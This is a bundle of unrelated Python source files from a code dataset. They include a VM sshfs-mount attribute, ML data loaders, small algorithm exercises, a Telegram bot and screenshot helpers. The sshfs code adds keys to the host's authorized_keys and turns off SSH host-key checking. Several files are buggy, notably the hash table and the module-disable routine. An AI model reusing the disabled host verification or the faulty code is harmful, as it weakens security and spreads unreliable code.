fusermount -f -u {instancepath}\n# - check returncode\n# destroy:\n# - open $HOME/.ssh/known_hosts on host\n# - check if public key entry exists\n# - remove key if exists\n# - write $HOME/.ssh/known_hosts\n\n\n_pending = Condition()\n\nclass SSHMountAttribute(NodeAttribute, need.NeedGuestFS, need.NeedSSH, need.NeedIO):\n atype = \"sshmount\"\n requires = [\"image\", \"ssh\", \"user\", \"network\"]\n\n key_path = \".ssh/xii-sshfs.key\"\n\n keys = Dict([\n VariableKeys(Dict([\n RequiredKey(\"source\", String(\"/path/to/source/directory\")),\n Key(\"user\", String(\"xii\"))\n ]), example=\"/path/to/dest/directory\")\n ])\n\n def sshfs_key_path(self, name):\n home = self.guest_user_home(name)\n if not home:\n return None\n return os.path.join(home, self.key_path)\n\n def spawn(self):\n self._check_sshfs_compability()\n\n required = self._get_required_users()\n host = self._host_name()\n\n _pending.acquire()\n\n authed_hosts = self._authorized_hosts()\n\n for user, home in required.items():\n\n path = os.path.join(home, self.key_path)\n\n sign = user + \"@\" + host\n (key, pubkey) = util.generate_rsa_key_pair()\n\n # save private key to domain_image\n self.say(\"{} => {}\".format(user, self.component_entity()))\n self.guest().write(path, key)\n\n for idx, host in enumerate(authed_hosts):\n # check if public key alreay exists. If so update key\n if host.find(sign) != -1:\n self.say(\"update authorized_keys ({})\".format(sign))\n authed_hosts[idx] = pubkey + \" \" + sign\n break\n else:\n self.say(\"{} => local authorized_keys\".format(sign))\n authed_hosts.append(pubkey + \" \" + sign)\n\n with open(self._authorized_keys_path(), \"w\") as auth:\n authed_hosts = filter(None, authed_hosts)\n auth.write(\"\\n\".join(authed_hosts))\n _pending.release()\n\n def destroy(self):\n authed_hosts = self._authorized_hosts()\n host = self._host_name()\n\n if not os.path.exists(self._authorized_keys_path()):\n return\n\n # removing key from authorized_keys\n\n _pending.acquire()\n for mount in self.settings().values():\n user = self.io().user()\n\n if \"user\" in mount:\n user = mount[\"user\"]\n\n sign = user + \"@\" + host\n\n for idx, host in enumerate(authed_hosts):\n if host.find(sign) != -1:\n del authed_hosts[idx]\n break\n\n with open(self._authorized_keys_path(), \"w\") as auth:\n authed_hosts = filter(None, authed_hosts)\n auth.write(\"\\n\".join(authed_hosts))\n _pending.release()\n\n\n def after_start(self):\n self._mount_dirs()\n pass\n\n def stop(self):\n self._umount_dirs()\n pass\n\n def after_resume(self):\n self._mount_dirs()\n pass\n\n def suspend(self):\n self._umount_dirs()\n pass\n\n def _mount_dirs(self):\n # local connection\n host = self.network_get_host_ip(self.other_attribute(\"network\").network_name())\n key = os.path.join(\"~\", self.key_path)\n\n # remote connection\n ssh = self.default_ssh()\n\n for dest, settings in self.settings().items():\n\n source = settings[\"source\"]\n user = self.io().user()\n\n if \"user\" in settings:\n user = settings[\"user\"]\n\n # make a absolute path if neccessary\n if not os.path.isabs(source):\n source = os.path.join(os.getcwd(), source)\n if not os.path.isabs(dest):\n dest = os.path.join(ssh.user_home(), dest)\n\n if not os.path.isdir(source):\n self.warn(\"sshfs source `{}` is not a directory\"\n .format(source))\n continue\n\n ssh.mkdir(dest)\n\n options = (\"-o StrictHostKeyChecking=no \"\n \"-o UserKnownHostsFile=/dev/null \"\n \"-o IdentityFile={}\".format(key))\n self.say(\"{} => {}\".format(source, dest))\n\n ssh.run(\"sshfs {}@{}:{} {} {}\".format(user, host, source, dest, options))\n\n def _umount_dirs(self):\n ssh = self.default_ssh()\n for dest, settings in self.settings().items():\n if not os.path.isabs(dest):\n dest = os.path.join(ssh.user_home(), dest)\n self.say(\"unmounting {}...\".format(dest))\n ssh.shell(\"fusermount -u {}\".format(dest))\n\n def _authorized_keys_path(self):\n local_home = os.path.expanduser('~')\n return os.path.join(local_home, \".ssh/authorized_keys\")\n\n def _authorized_hosts(self):\n authorized_keys = self._authorized_keys_path()\n\n # touch the file if not exists\n if not os.path.isfile(authorized_keys):\n with open(authorized_keys, \"a\"):\n pass\n\n with open(authorized_keys, \"r\") as auth:\n content = [line.strip() for line in auth.readlines()]\n return filter(None, content)\n\n def _host_name(self):\n return self.component_entity()\n\n def _check_sshfs_compability(self):\n sshfs_locations = [\"/usr/bin/sshfs\"]\n\n self.say(\"checking sshfs compability\")\n for location in sshfs_locations:\n if self.guest().exists(location):\n return\n\n raise error.NotFound(\"Image for {} seems to not support sshfs.\"\n .format(self.component_entity()))\n\n def _get_required_users(self):\n required = {}\n\n users = self.guest_get_users()\n default = self.default_ssh_user()\n\n for mount in self.settings().values():\n user = default\n\n if \"user\" in mount:\n user = mount[\"user\"]\n\n if user not in users:\n self.warn(\"can not use {} for sshfs. User does not exist\"\n .format(user))\n continue\n\n # we already prepare this user\n if user in required:\n continue\n\n required[user] = users[user][\"home\"]\n return required\n","sub_path":"src/xii/builtin/components/node/attributes/sshmount/node_sshmount.py","file_name":"node_sshmount.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467277531","text":"import sys, os\nfrom jstatutree.jstatute_dict import JStatuteDict, JStatutreeKVSDict, JSSentenceKVSDict\nimport unittest\nfrom jstatutree import lawdata\nfrom jstatutree.xmltree import xml_lawdata as xml_lawdata\nfrom jstatutree.etypes import Law, Article, Sentence\nimport shutil\n\nclass LawDataTestCase(unittest.TestCase):\n def setgetitem_testunit(self, assert_if, lawnum, only_reiki):\n jsdict = JStatuteDict(only_reiki=only_reiki)\n statute = lawdata.SourceInterface()\n statute._lawdata = lawdata.LawData()\n statute.lawdata._lawnum = lawnum\n if assert_if == \"skip\":\n jsdict[statute.lawdata] = statute\n self.assertTrue(len(jsdict) == 0)\n elif assert_if == \"success\":\n jsdict[statute.lawdata] = statute\n self.assertTrue(len(jsdict) == 1)\n self.assertTrue(jsdict[statute.lawdata] == statute)\n\n def test_setgetitem(self):\n self.setgetitem_testunit(\"success\", \"XX条例\", True)\n self.setgetitem_testunit(\"success\", \"XX規則\", True)\n self.setgetitem_testunit(\"skip\", \"XX告示\", True)\n self.setgetitem_testunit(\"success\", \"XX条例\", False)\n self.setgetitem_testunit(\"success\", \"XX規則\", False)\n self.setgetitem_testunit(\"success\", \"XX告示\", False)\n self.assertRaises(\n Exception,\n lambda: JStatuteDict().__setitem__(\"hoge\", \"fuga\")\n )\n\nTEST_PATH = os.path.dirname(__file__)\nDB_PATH = os.path.join(TEST_PATH, \"testdb.ldb\")\nDATASET_PATH = os.path.join(TEST_PATH, \"testset\")\nclass JSKVSTestCase(unittest.TestCase):\n def setUp(self):\n self.levels = [Law, Article, Sentence]\n self.treedict = JStatutreeKVSDict(path=DB_PATH, levels=self.levels, create_if_missing=True)\n self.sentence_dicts = {\n level.__name__: JSSentenceKVSDict(kvsdict=self.treedict, level=level)\n for level in self.levels\n }\n self.rr = xml_lawdata.ReikiXMLReader(\n os.path.join(\n os.path.dirname(__file__), \"testset/01/010001/0001.xml\"\n )\n )\n self.rr.open()\n\n def tearDown(self):\n self.treedict.close()\n shutil.rmtree(DB_PATH)\n\n def test_init(self):\n self.assertTrue(self.treedict.levels == [Law, Article, Sentence])\n for level in self.levels:\n self.assertTrue(self.sentence_dicts[level.__name__].prefix == \"sentence-{}-\".format(level.__name__).encode(self.sentence_dicts[level.__name__].ENCODING))\n\n\n def regtree_test_unit(self, elem, next_level_i):\n print(elem.etype.__name__, self.levels[next_level_i].__name__)\n correct_next_elems = list(elem.depth_first_search(self.levels[next_level_i]))\n correct_next_elem_codes = sorted([e.code for e in correct_next_elems])\n self.assertEqual(sorted(self.treedict[elem.code]), correct_next_elem_codes)\n for next_elem in elem.depth_first_search(self.levels[next_level_i]):\n if next_level_i+1 < len(self.levels):\n self.regtree_test_unit(next_elem, next_level_i+1)\n\n def test_regtree(self):\n ld = self.rr.lawdata\n ld.is_reiki = lambda: True\n tree = self.rr.get_tree()\n self.treedict[self.rr.lawdata.code] = tree\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/jstatutree_dict_test.py","file_name":"jstatutree_dict_test.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491530121","text":"from __future__ import print_function, division, absolute_import, with_statement, unicode_literals, generators\nimport torch\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport os\nimport pickle\nimport numpy as np\nimport nltk\nfrom PIL import Image\nfrom caption_vocab import Vocabulary\nfrom pycocotools.coco import COCO\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n# Image preprocessing, normalization for the pretrained resnet\ncrop_size = 224\nnormalizer = transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\ntrain_transform = transforms.Compose([\n transforms.RandomCrop(crop_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalizer])\neval_transform = transforms.Compose([\n transforms.Resize([crop_size, crop_size]),\n transforms.ToTensor(),\n normalizer])\n\ndef tokenize_and_encapsulate(vocab):\n def fn(caption):\n \"\"\"Convert caption (string) to word ids.\"\"\"\n tokens = nltk.tokenize.word_tokenize(str(caption).lower())\n ids = []\n ids.append(vocab.bos_token_id)\n ids.extend(map(vocab, tokens))\n ids.append(vocab.eos_token_id)\n return ids\n return fn\n\nclass CocoDataset(data.Dataset):\n \"\"\"COCO Custom Dataset compatible with torch.utils.data.DataLoader.\"\"\"\n def __init__(self, root, json, vocab, transform=None):\n \"\"\"Set the path for images, captions and vocabulary wrapper.\n \n Args:\n root: image directory.\n json: coco annotation file path.\n vocab: vocabulary wrapper.\n transform: image transformer.\n \"\"\"\n self.root = root\n self.coco = COCO(json)\n self.vocab = vocab\n self.fn = tokenize_and_encapsulate(self.vocab)\n self.transform = transform\n\n def __len__(self):\n raise NotImplementedError\n\n def __getitem__(self, index):\n raise NotImplementedError\n\nclass CocoAnnDataset(CocoDataset):\n def __init__(self, root, json, vocab, transform=None):\n super(CocoAnnDataset, self).__init__(root, json, vocab, transform)\n self.anns = list(self.coco.anns.values())\n\n def __len__(self):\n return len(self.anns)\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (image and caption).\"\"\"\n ann = self.anns[index]\n caption = ann['caption']\n img_id = ann['image_id']\n path = self.coco.loadImgs(img_id)[0]['file_name']\n image = Image.open(os.path.join(self.root, path)).convert('RGB')\n if self.transform is not None:\n image = self.transform(image)\n return image, self.fn(caption)\n\nclass CocoImgDataset(CocoDataset):\n def __init__(self, root, json, vocab, transform=None):\n super(CocoImgDataset, self).__init__(root, json, vocab, transform)\n self.imgToAnns = list(self.coco.imgToAnns.items())\n self.imgToAnns.sort()\n\n def __len__(self):\n return len(self.imgToAnns)\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (image and captions).\"\"\"\n vocab = self.vocab\n img_id, anns = self.imgToAnns[index]\n captions = (ann['caption'] for ann in anns)\n path = self.coco.loadImgs(img_id)[0]['file_name']\n image = Image.open(os.path.join(self.root, path)).convert('RGB')\n if self.transform is not None:\n image = self.transform(image)\n return image, list(map(self.fn, captions))\n\ndef ann_collate_fn_on_device(device):\n def collate_fn(data):\n \"\"\"Creates mini-batch tensors from the list of tuples (image, caption).\n \n We should build custom collate_fn rather than using default collate_fn, \n because merging caption (including padding) is not supported in default.\n\n Args:\n data: list of tuple (image, caption). \n - image: torch tensor of shape (3, 256, 256).\n - caption: list.\n\n Returns:\n images: torch tensor of shape (batch_size, 3, 256, 256).\n targets: torch tensor of shape (batch_size, padded_length).\n lengths: list; valid length for each padded caption.\n \"\"\"\n # Sort a data list by caption length (descending order).\n #data.sort(key=lambda x: len(x[1]), reverse=True)\n images, captions = zip(*data)\n\n # Merge images (from tuple of 3D tensor to 4D tensor).\n images = torch.stack(images, 0).to(device)\n\n # Merge captions (from tuple of 1D tensor to 2D tensor).\n lengths = [len(cap) for cap in captions]\n targets = torch.zeros(len(captions), max(lengths), dtype=torch.long)\n for i, cap in enumerate(captions):\n targets[i, :len(cap)] = torch.tensor(cap, dtype=torch.long)\n targets = targets.to(device)\n #targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]\n return images, targets, lengths\n\n return collate_fn\n\ndef img_collate_fn_on_device(device):\n def collate_fn(data):\n \"\"\"Creates mini-batch tensors from the list of tuples (image, captions).\n \n We should build custom collate_fn rather than using default collate_fn, \n because merging caption (including padding) is not supported in default.\n\n Args:\n data: list of tuple (image, captions). \n - image: torch tensor of shape (3, 256, 256).\n - captions: list of list.\n\n Returns:\n images: torch tensor of shape (batch_size, 3, 256, 256).\n captions: same as input.\n \"\"\"\n images, captions = zip(*data)\n\n # Merge images (from tuple of 3D tensor to 4D tensor).\n images = torch.stack(images, 0).to(device)\n\n return images, captions\n\n return collate_fn\n\ndef get_ann_loader(root, json, vocab, batch_size, transform=train_transform, shuffle=True, num_workers=0, device='cuda'):\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\n # COCO caption dataset\n coco = CocoAnnDataset(root=root,\n json=json,\n vocab=vocab,\n transform=transform)\n \n # Data loader for COCO dataset\n # This will return (images, captions, lengths) for each iteration.\n # images: a tensor of shape (batch_size, 3, 224, 224).\n # captions: a tensor of shape (batch_size, padded_length).\n # lengths: a list indicating valid length for each caption. length is (batch_size).\n data_loader = torch.utils.data.DataLoader(dataset=coco, \n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=ann_collate_fn_on_device(device))\n return data_loader\n\ndef get_img_loader(root, json, vocab, batch_size, transform=eval_transform, shuffle=False, num_workers=0, device='cuda'):\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\n # COCO caption dataset\n coco = CocoImgDataset(root=root,\n json=json,\n vocab=vocab,\n transform=transform)\n \n # Data loader for COCO dataset\n # This will return (images, captions) for each iteration.\n # images: a tensor of shape (batch_size, 3, 224, 224).\n data_loader = torch.utils.data.DataLoader(dataset=coco, \n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=img_collate_fn_on_device(device))\n return data_loader\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"42546383","text":"class Node:\n def __init__(self, val):\n self.data = val\n self.next = None\n\n\ndef print_linked_list(head):\n # a while loop to print the linked list\n curr = head\n while(curr):\n print(curr.data, end=\" \")\n curr = curr.next\n print()\n\n\ndef give_length(head):\n # utility function to calculate length or number of nodes in the linked list\n\n if head is None:\n return 0\n curr = head\n length = 0\n while(curr is not None):\n length += 1\n curr = curr.next\n return length\n\n\ndef segregate_even_odd_ll(head):\n\n # base case if linked list has only one node\n if head.next is None:\n # return the ll\n return head\n\n # now we first or segregate the linked list into two linked lists\n odd_head, odd_last, even_head, even_last = None, None, None, None\n\n curr = head\n\n while curr is not None:\n\n # two possiblities either data at curr is odd or even\n\n if curr.data % 2 == 1:\n\n # two possiblities either it is the first element for the even ll\n # or not\n\n if odd_head is None:\n # first element to be put in linked list\n odd_head = curr\n odd_last = curr\n\n elif odd_head is not None:\n odd_last.next = curr\n odd_last = curr\n\n if curr.data % 2 == 0:\n\n # two possiblities either it is the first element for the even ll\n # or not\n\n if even_head is None:\n # first element to be put in linked list\n even_head = curr\n even_last = curr\n\n elif even_head is not None:\n even_last.next = curr\n even_last = curr\n curr = curr.next\n\n if even_last is not None:\n even_last.next = odd_head\n if odd_last is not None:\n odd_last.next = None\n head = even_head\n\n else:\n head = odd_head\n\n return head\n\n\ndef create_ll(head, arr):\n curr = head\n for i in range(1, len(arr)):\n new_node = Node(arr[i])\n curr.next = new_node\n curr = new_node\n\n return head\n\n\n# main function\nif __name__ == '__main__':\n\n test = int(input())\n\n while test > 0:\n n = int(input())\n arr = list(map(int, input().split(' ')))\n head = Node(arr[0])\n fir_head = create_ll(head, arr)\n # print_linked_list(fir_head)\n p = segregate_even_odd_ll(fir_head)\n print_linked_list(p)\n test -= 1\n\n # fir_head = Node(12)\n # tem = Node(15)\n # tem1 = Node(10)\n # tem2 = Node(11)\n # tem3 = Node(5)\n # tem4 = Node(6)\n # tem5 = Node(2)\n # tem6 = Node(3)\n # fir_head.next = tem\n # tem.next = tem1\n # tem1.next = tem2\n # tem2.next = tem3\n # tem3.next = tem4\n # tem4.next = tem5\n # tem5.next = tem6\n # print_linked_list(fir_head)\n # p = segregate_even_odd_ll(fir_head)\n # print_linked_list(fir_head)\n","sub_path":"segregate_even_odd_ll.py","file_name":"segregate_even_odd_ll.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328294995","text":"from turtle import *\r\nfrom turtle import Turtle, Screen\r\n\r\nclass Ball(Turtle):\r\n \r\n def __init__(self, x, y, dx, dy, r, color):\r\n Turtle.__init__(self)\r\n print(color)\r\n \r\n self.penup()\r\n self.goto(x, y)\r\n self.shape(\"circle\")\r\n self.color(color)\r\n \r\n self.dx = dx\r\n self.dy = dy\r\n self.r = r\r\n self.shapesize(self.r/10)\r\n\r\n def move(self, screen_width, screen_height):\r\n current_x = self.position()[0]\r\n new_x = current_x + self.dx\r\n\r\n current_y = self.position()[1]\r\n new_y = current_y + self.dy\r\n\r\n right_side_ball = new_x + self.r\r\n left_side_ball = new_x - self.r\r\n up_side_ball = new_y + self.r\r\n down_side_ball = new_y - self.r\r\n\r\n self.goto(new_x,new_y)\r\n\r\n if(right_side_ball > screen_width or left_side_ball < -screen_width):\r\n self.dx = -self.dx\r\n if right_side_ball>screen_width:\r\n self.goto(screen_width-self.r,current_y+self.dy)\r\n if left_side_ball<-screen_width:\r\n self.goto(-screen_width+self.r,current_y+self.dy)\r\n\r\n if(up_side_ball > screen_height or down_side_ball < -screen_height):\r\n self.dy = -self.dy\r\n if up_side_ball>screen_height:\r\n self.goto(current_x+self.dx,screen_height-self.r)\r\n if down_side_ball<-screen_height:\r\n self.goto(current_x+self.dx,-screen_height+self.r)\r\n \r\n\r\n def new_Ball(self, x, y, dx, dy, r, color):\r\n #color = tuple([a/255 for a in color])\r\n print(color)\r\n \r\n self.goto(x, y)\r\n self.shape(\"circle\")\r\n self.shapesize(r/10)\r\n try:\r\n self.color(color)\r\n except:\r\n self.color('blue')\r\n self.penup()\r\n \r\n \r\n self.dx = dx\r\n self.dy = dy\r\n self.r = r\r\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163839736","text":"from pathlib import Path\n\nvalues = Path('https://github.com/first20hours/google-10000-english/blob/master/google-10000-english-usa.txt').read_text()\n\nclass HashTable(object):\n def __init__(self, length=4):\n self.array = [None] * length\n\n def hash(selfself, key):\n length = len(self.array)\n return hash(key) % length\n\n def add(self, key, value):\n index = self.hash(key)\n if self.array[index] is not None:\n for kvPairs in self.array[index]:\n if kvPairs[0] == key:\n kvPairs[1] = value\n break\n\n else:\n self.array[index].append([key, value])\n\n if self.is_full():\n self.double()\n\n def get(selfself, key):\n index = self.hash(key)\n if self.array[index] is None:\n raise KeyError()\n else:\n for kvPairs in self.array[index]:\n if kvPairs[0] ==key:\n return kvPairs[1]\n\n raise KeyError()\n\n def is_full(self):\n items = 0\n for item in self.array:\n if item is not None:\n items += 1\n return items > len(self.array)/2\n\n def double(self):\n htTwo = HashTable(length=len(self.array)*2)\n for i in range(len(self.array)):\n if self.array[i] is None:\n continue\n\n for kvPairs in self.array[i]:\n htTwo.add(kvPairs[0], kvPairs[1])\n\n self.array = htTwo.array\n\n\n","sub_path":"Hashing.py","file_name":"Hashing.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539457127","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n self.min = 99999\n self.cur = 0\n self.deep(root)\n return self.min\n\n def deep(self, node: TreeNode) -> None:\n if not node:\n self.min = self.cur\n return\n self.cur += 1\n if not node.left and not node.right and self.cur < self.min:\n self.min = self.cur\n if node.left:\n self.deep(node.left)\n if node.right:\n self.deep(node.right)\n self.cur -= 1\n","sub_path":"0111.py","file_name":"0111.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647551747","text":"import django_filters\n\nfrom .models import Category, Genre, Title\n\n\nclass TitleFilter(django_filters.FilterSet):\n genre = django_filters.filters.ModelMultipleChoiceFilter(\n queryset=Genre.objects.all(),\n field_name='genre__slug',\n to_field_name='slug',\n )\n category = django_filters.filters.ModelChoiceFilter(\n queryset=Category.objects.all(),\n field_name='category',\n to_field_name='slug',\n )\n name = django_filters.CharFilter(lookup_expr='contains')\n year = django_filters.NumberFilter()\n\n class Meta:\n model = Title\n fields = ['category', 'genre', 'name', 'year']\n","sub_path":"categories/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154443801","text":"from homebot.core.error_handler import error_handler\nfrom homebot.core.logging import LOGE, LOGI\nfrom homebot.core.mdlintf import get_all_modules_list, get_module\nfrom telegram.ext import Dispatcher, Updater\nfrom threading import Lock\nfrom types import MethodType\n\n# Module status\n(\n\tMODULE_STATUS_DISABLED,\n\tMODULE_STATUS_ENABLED,\n\tMODULE_STATUS_ENABLING,\n\tMODULE_STATUS_DISABLING,\n\tMODULE_STATUS_ERROR,\n) = range(5)\n\nMODULE_STATUS_MESSAGE = {\n\tMODULE_STATUS_DISABLED: \"Disabled\",\n\tMODULE_STATUS_ENABLED: \"Enabled\",\n\tMODULE_STATUS_ENABLING: \"Enabling\",\n\tMODULE_STATUS_DISABLING: \"Disabling\",\n\tMODULE_STATUS_ERROR: \"Error\",\n}\n\ndef enable_module(self: Dispatcher, module_name: str):\n\t\"\"\"\n\tLoad a provided module and add its command handler\n\tto the bot's dispatcher.\n\t\"\"\"\n\tLOGI(f\"Loading module {module_name}\")\n\n\tmodule = get_module(module_name)\n\tif module is None:\n\t\traise ModuleNotFoundError(f\"Module {module_name} not found\")\n\n\twith self.modules_status_lock:\n\t\tif not module_name in self.modules_status:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\n\t\tif self.modules_status[module_name] == MODULE_STATUS_ENABLED:\n\t\t\traise AttributeError(\"Module is already enabled\")\n\n\t\tself.modules_status[module_name] = MODULE_STATUS_ENABLING\n\n\t\ttry:\n\t\t\tfor command in module.commands:\n\t\t\t\tself.add_handler(command.handler)\n\t\t\tmodule.add_user(self.bot)\n\t\texcept:\n\t\t\tLOGE(f\"Failed to add handler for module {module_name}\")\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ERROR\n\t\telse:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ENABLED\n\t\t\tLOGI(f\"Module {module_name} enabled\")\n\ndef disable_module(self: Dispatcher, module_name: str):\n\t\"\"\"\n\tUnload a provided module and remove its command handler\n\tfrom the bot's dispatcher.\n\t\"\"\"\n\tLOGI(f\"Loading module {module_name}\")\n\n\tmodule = get_module(module_name)\n\tif module is None:\n\t\traise ModuleNotFoundError(f\"Module {module_name} not found\")\n\n\twith self.modules_status_lock:\n\t\tif not module_name in self.modules_status:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\n\t\tif self.modules_status[module_name] == MODULE_STATUS_DISABLED:\n\t\t\traise AttributeError(\"Module is already disabled\")\n\n\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLING\n\n\t\ttry:\n\t\t\tfor command in module.commands:\n\t\t\t\tself.add_handler(command.handler)\n\t\t\tmodule.remove_user(self.bot)\n\t\texcept:\n\t\t\tLOGE(f\"Failed to add handler for module {module_name}\")\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ERROR\n\t\telse:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\t\t\tLOGI(f\"Module {module_name} disabled\")\n\nclass HomeBot(Updater):\n\tdef __init__(self, token: str):\n\t\tsuper().__init__(token=token)\n\n\t\tself.dispatcher.add_error_handler(error_handler, True)\n\n\t\tself.dispatcher.modules_status = {}\n\t\tself.dispatcher.modules_status_lock = Lock()\n\n\t\tself.dispatcher.enable_module = MethodType(enable_module, self.dispatcher)\n\t\tself.dispatcher.disable_module = MethodType(disable_module, self.dispatcher)\n\n\t\tfor module_name in get_all_modules_list():\n\t\t\tself.dispatcher.enable_module(module_name)\n","sub_path":"homebot/core/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"240585780","text":"from hashlib import md5\n\n\ndef solution(key, zeros='00000'):\n cnt = 0\n fmt = '{}{{}}'.format(key).format\n result = []\n while len(result) < 8:\n current = md5(fmt(cnt).encode()).hexdigest()\n if current.startswith(zeros):\n result.append(current[5])\n cnt += 1\n return ''.join(result)\n\n\ndef solution_2(key, zeros='00000'):\n cnt = 0\n fmt = '{}{{}}'.format(key).format\n free_slots = 8\n result = [None] * 8\n while free_slots:\n current = md5(fmt(cnt).encode()).hexdigest()\n if current.startswith(zeros):\n try:\n dex = int(current[5])\n if result[dex] is None:\n result[dex] = current[6]\n free_slots -= 1\n except (IndexError, ValueError):\n pass\n cnt += 1\n return ''.join(result)\n","sub_path":"2016/day_5.py","file_name":"day_5.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352051445","text":"from PIL import Image\nimport logging\nfrom pyscreenshot import imcodec\nfrom pyscreenshot.about import __version__\nfrom pyscreenshot.loader import Loader, FailedBackendError\nfrom pyscreenshot.procutil import run_in_childprocess\n\n\nADDITIONAL_IMPORTS=[FailedBackendError]\n\nlog = logging.getLogger(__name__)\nlog.debug('version=%s', __version__)\n\n\ndef _grab_simple(to_file, backend=None, bbox=None, filename=None, timeout=None):\n loader = Loader()\n loader.force(backend)\n backend_obj = loader.selected()\n\n if to_file:\n return backend_obj.grab_to_file(filename)\n else:\n return backend_obj.grab(bbox)\n\n\ndef _grab(to_file, childprocess=True, backend=None, bbox=None, filename=None, timeout=20):\n if childprocess:\n log.debug('running \"%s\" in child process', backend)\n return run_in_childprocess(_grab_simple, imcodec.codec, to_file, backend, bbox, filename, timeout=timeout)\n else:\n return _grab_simple(to_file, backend, bbox, filename)\n\n\ndef grab(bbox=None, childprocess=True, backend=None):\n \"\"\"Copy the contents of the screen to PIL image memory.\n\n :param bbox: optional bounding box (x1,y1,x2,y2)\n :param childprocess: pyscreenshot can cause an error,\n if it is used on more different virtual displays\n and back-end is not in different process.\n Some back-ends are always different processes: scrot, imagemagick\n :param backend: back-end can be forced if set (examples:scrot, wx,..),\n otherwise back-end is automatic\n\n \"\"\"\n return _grab(to_file=False, childprocess=childprocess, backend=backend, bbox=bbox)\n\n\ndef grab_to_file(filename, childprocess=True, backend=None, timeout=20, num_retries=0):\n \"\"\"Copy the contents of the screen to a file.\n\n :param filename: file for saving\n :param childprocess: see :py:func:`grab`\n :param backend: see :py:func:`grab`\n\n \"\"\"\n error = ''\n for turn in range(num_retries+1):\n try:\n return _grab(to_file=True, childprocess=childprocess, backend=backend, filename=filename, timeout=timeout)\n except Exception as e:\n error += str(e)\n raise Exception(error)\n\n\ndef backends():\n '''Back-end names as a list\n \n :return: back-ends as string list\n '''\n return Loader().all_names\n\n\ndef _backend_version(backend):\n loader = Loader()\n loader.force(backend)\n try:\n x = loader.selected()\n v = x.backend_version()\n except Exception:\n v = None\n return v\n\n\ndef backend_version(backend, childprocess=True):\n '''Back-end version\n\n :param backend: back-end (examples:scrot, wx,..)\n :param childprocess: see :py:func:`grab`\n :return: version as string\n '''\n if not childprocess:\n return _backend_version(backend)\n else:\n return run_in_childprocess(_backend_version, None, backend)\n","sub_path":"pyscreenshot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286167048","text":"from bs4 import BeautifulSoup, Comment\nimport requests\nimport shutil\n\n\ndef get_beautiful_soup(url):\n response = requests.get(url)\n bs = BeautifulSoup(response.text)\n return bs\n\n\ndef get_comments_bs(soup):\n comments = soup.findAll(text=lambda text: isinstance(text, Comment))\n return comments\n\n\ndef download_file(url):\n local_filename = url.split('/')[-1]\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.flush()\n return local_filename\n\n\ndef download_photo(url):\n response = requests.get(url, stream=True)\n file_name = url.split('/')[-1]\n with open(file_name, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"374684197","text":"import discord\nfrom discord.ext import commands\nimport os\nimport re\nimport aiofiles\nimport aiohttp\nfrom src.webhook import send_message\n\nEMOJI_DIR = 'emojis'\n\n\nclass emoji_manager():\n def __init__(self, client, guild):\n self.client = client\n self.guild = guild\n self._priorities = list(self.guild.emojis)\n if not os.path.exists(EMOJI_DIR + '/' + str(self.guild.id)):\n os.makedirs(EMOJI_DIR + '/' + str(self.guild.id))\n\n @property\n def max_emojis(self):\n maxes = (49, 99, 149, 249)\n return 